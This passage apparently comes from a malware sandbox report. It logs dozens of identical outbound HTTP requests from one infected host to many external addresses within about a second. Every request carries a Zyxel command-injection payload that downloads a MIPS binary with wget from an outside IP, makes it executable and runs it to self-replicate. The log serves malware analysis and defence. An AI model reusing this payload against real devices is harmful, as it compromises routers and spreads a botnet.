                                          Jan 14, 2024 15:46:25.199208021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6626192.168.2.235402649.147.108.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199254990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6627192.168.2.2350284146.81.206.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199280024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6628192.168.2.2354982144.206.114.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199323893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6629192.168.2.2342500165.183.251.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199347019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6630192.168.2.2346856195.129.59.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199366093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6631192.168.2.2332978192.169.5.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199397087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6632192.168.2.234696817.177.106.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199445963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6633192.168.2.235908093.79.223.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199460983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6634192.168.2.2335680170.86.122.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199501038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6635192.168.2.2335470212.90.125.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199517012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6636192.168.2.2353930202.130.190.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199569941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6637192.168.2.2346370151.216.55.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199589968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6638192.168.2.2356738159.141.53.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199624062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6639192.168.2.235232031.95.150.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199645996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6640192.168.2.2350358201.27.27.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.203685045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6641192.168.2.2351652134.133.237.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.203701019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6642192.168.2.235555261.136.230.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.203737020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6643192.168.2.2349076218.82.112.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.203741074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6644192.168.2.2356006208.41.158.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.206227064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6645192.168.2.2335438137.121.81.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.212428093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6646192.168.2.2344266111.219.146.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.212445021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6647192.168.2.2356336141.173.23.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.212470055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6648192.168.2.234364667.240.36.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.212487936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6649192.168.2.2341650192.215.166.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.212487936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6650192.168.2.2336478144.174.144.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.212519884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6651192.168.2.235771278.28.133.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.212521076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6652192.168.2.235956673.109.57.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.212554932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6653192.168.2.2356670188.54.150.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.212599993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6654192.168.2.2347650169.130.79.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.212636948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6655192.168.2.2340602131.85.152.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.212645054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6656192.168.2.2343058218.196.118.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.212686062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6657192.168.2.2335810116.234.129.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.212686062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6658192.168.2.234631053.141.65.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.212726116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6659192.168.2.2346252110.91.13.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.212888002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6660192.168.2.2338752148.255.11.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.212904930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6661192.168.2.234163482.182.84.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219399929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6662192.168.2.233975065.6.229.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219424963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6663192.168.2.2357514132.128.106.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219459057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6664192.168.2.2340040102.192.97.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219470978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6665192.168.2.2349404106.142.242.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219505072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6666192.168.2.2333482135.243.5.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219526052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6667192.168.2.235581865.22.114.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219567060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6668192.168.2.2336720205.116.91.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219594955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6669192.168.2.2353198153.44.182.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219603062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6670192.168.2.235337462.110.85.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219604969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6671192.168.2.233938037.105.231.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219620943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6672192.168.2.2335350147.254.67.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219625950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6673192.168.2.235298873.33.215.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219640017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6674192.168.2.2335820208.15.221.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219732046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6675192.168.2.2353634210.218.239.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219747066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6676192.168.2.2351786131.131.90.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219779015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6677192.168.2.233974071.224.49.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219819069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6678192.168.2.233432298.180.154.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219855070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6679192.168.2.2346628195.236.222.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219891071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6680192.168.2.2353798106.116.156.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219906092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6681192.168.2.2338680112.171.100.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219938993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6682192.168.2.2352100201.151.140.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219966888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6683192.168.2.234651083.159.198.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219973087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6684192.168.2.2338236208.235.146.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.219994068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6685192.168.2.2355962128.54.154.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220050097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6686192.168.2.235416476.84.126.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220077991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6687192.168.2.2347578201.145.183.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220105886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6688192.168.2.2354068155.133.158.9443
                                          TimestampBytes transferredDirectionData
